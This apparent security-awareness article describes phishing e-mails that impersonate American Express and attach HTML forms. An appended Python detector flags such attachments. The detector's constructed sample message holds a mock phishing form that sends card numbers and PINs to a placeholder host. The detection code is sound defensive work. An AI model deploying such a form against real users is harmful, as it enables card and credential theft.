Hacker News
Pay attention to the phishing forms delivered through American Express e-mails

American Express is a brand that is trusted around the world. When you see an e-mail from this company in your inbox, you automatically think that there’s nothing wrong with it and it has informative purposes. Well, combine the reputation of American Express with a warning concerning your credit card.
What will happen? You will actually believe that the e-mail is meant to keep you safe and prevent the theft of sensitive data. Unfortunately, this is not the case. There’s a scam that uses the name of the American Express brand for phishing purposes, so beware of this type of e-mail.
How do these e-mails work? If you are not paying sufficient attention, they can look like genuine American Express e-mails, as they use precisely the same logos and visual elements. Plus, when you read that there are issues with your credit card, all you’ll focus on will be the so-called credit card problems.
You will want to solve them immediately, so you are tempted to follow the instructions presented by the e-mail you just received. In this case, you will be prompted to use an HTML phishing form that is supposed to help you out. But it will do the opposite, as the information shared through such a form will end up in the wrong hands.
The worst part is that this kind of e-mail is not something new. They have been sent since October of this year. They were also sent in a number of versions so that people won’t suspect anything. However, all the versions were made to appear like reports or notifications concerning problems with the user’s credit card.
This way, the scammers had a good excuse to demand sensitive information, with the so-called intention of repairing the problem. Besides asking users to complete the form, the e-mails also recommended the creation of another account, at a specified website address. Because the e-mails are sent to people that have accounts at American Express and have subjects that appear rather urgent, like “action required” or “security notification”, they are rather credible to the untrained eye. To make it look even more authentic after the user submits the form, a real American Express page is displayed, thanking the user for his or her feedback.
It is worth remembering that companies will never use forms attached to an e-mail when requesting sensitive data from their customers. This form of transmitting data is not safe, so it will not be employed by service providers that wish to protect their clients. If you do receive an e-mail asking you to submit personal information with the help of a form, it is recommended not to do so without further checks. It doesn’t matter if the e-mail comes from American Express or any other company.
If you receive such requests via e-mail, the best way to check the validity of the request is by calling the company in question by phone and asking if they actually made such a request. If the answer of the company is negative, you are probably looking at an e-mail with a phishing form attached. So, it is best to delete the e-mail and not follow its instructions.
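The rule above (no legitimate provider collects sensitive data through a form attached to an e-mail) can also be checked automatically at a mail gateway or in a mailbox triage script. The following is an added example, not code from the article or from American Express; the function and field names, the sample message and the `example.invalid` host are all constructed for illustration.

```python
from email import message_from_bytes, policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Subject phrases quoted in the article.
URGENT_SUBJECTS = ("action required", "security notification")

class FormFinder(HTMLParser):
    """Collects <form> action targets and counts visible <input> fields."""
    def __init__(self):
        super().__init__()
        self.actions, self.inputs = [], 0
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.actions.append(attrs.get("action") or "")
        elif tag == "input" and (attrs.get("type") or "text").lower() != "hidden":
            self.inputs += 1

def inspect_message(raw: bytes) -> dict:
    """Flag HTML attachments that contain a data-entry form."""
    msg = message_from_bytes(raw, policy=policy.default)
    subject = (msg["Subject"] or "").lower()
    hits = []
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue
        finder = FormFinder()
        finder.feed(part.get_content())
        if finder.actions and finder.inputs:
            hosts = sorted({urlparse(a).hostname or "(local)" for a in finder.actions})
            hits.append({"filename": part.get_filename(), "inputs": finder.inputs,
                         "post_hosts": hosts})
    return {"urgent_subject": any(p in subject for p in URGENT_SUBJECTS),
            "form_attachments": hits, "suspicious": bool(hits)}

# Constructed sample message (not a real capture); hosts are placeholders.
SAMPLE = b"""\
Subject: Security Notification: Action Required
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html
Content-Disposition: attachment; filename="form.html"

<form action="http://collector.example.invalid/submit" method="post">
<input name="card_number"><input type="password" name="pin"></form>
--b1--
"""
```

Calling `inspect_message(SAMPLE)` reports the attached form, its two input fields and the host it would post to. Attachments sent with a generic content type instead of `text/html` are not covered by this check.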